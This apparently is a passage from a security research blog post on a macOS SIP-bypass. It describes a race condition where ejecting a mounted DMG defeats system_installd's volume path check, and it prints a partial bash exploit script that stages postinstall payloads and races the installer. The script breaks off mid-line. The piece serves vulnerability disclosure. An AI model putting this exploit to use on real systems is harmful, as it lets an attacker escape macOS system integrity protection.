Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities

A new bypass appears

According to the aforementioned patch, we can see that if we can bypass the volume path check at line 81, then the system_installd service will spawn the script directly instead of resorting to the isolated XPC service.

The question then is, how can we bypass the volume path check? Through debugging, we found that the destination volume path returned at line 80 is an arbitrary mounted DMG volume path that we specified from the installer command line.

So what happens if we eject the DMG volume immediately before the check? Testing this inquiry, we found that it would return the root volume at line 80 and bypass the check at line 81 as expected.

Here is how the exploitation works using a bash script:

#!/bin/bash

echo “[*] preparing the payload…”
MOUNT_DIR=”/tmp/.exploit”
PAYLOAD_DIR=”$MOUNT_DIR/payload”
PAYLOAD_POST_PATH=”$PAYLOAD_DIR/postinstall”
PAYLOAD_PRE_PATH=”$PAYLOAD_DIR/preinstall”
mkdir -p “$PAYLOAD_DIR”
# create postinstall script
echo “#!/bin/bash” > “$PAYLOAD_POST_PATH”
echo $1 >> “$PAYLOAD_POST_PATH”
chmod +x “$PAYLOAD_POST_PATH”
# create preinstall script just to make the exploit more elegant
echo “#!/bin/bash” > “$PAYLOAD_PRE_PATH”
echo “echo ‘just a place holder, our payload is in the postinstall.’” >> “$PAYLOAD_PRE_PATH”
chmod +x “$PAYLOAD_PRE_PATH”

echo “[*] preparing the dmg mounting…”
hdiutil create -size 50m -volname .exploit -ov disk.dmg
hdiutil attach -mountpoint $MOUNT_DIR disk.dmg

sudo echo “[*] all the preparations are done.”
sudo installer -pkg $2 -target $MOUNT_DIR &

echo “[*] waiting for installer…”
while true ; do
    target=`compgen -G “$MOUNT_DIR/.PKInstallSandboxManager-SystemSoftware/*/OpenPath*/Scripts/*/postinstall”`
    if [ $target ]; then
          #hdiutil detach $MOUNT_DIR
          #detach is slow, kill the process will help us eject the dmg immediately, to win the race condition.
          kill

Read more

Explore the site

More from the blog

Latest News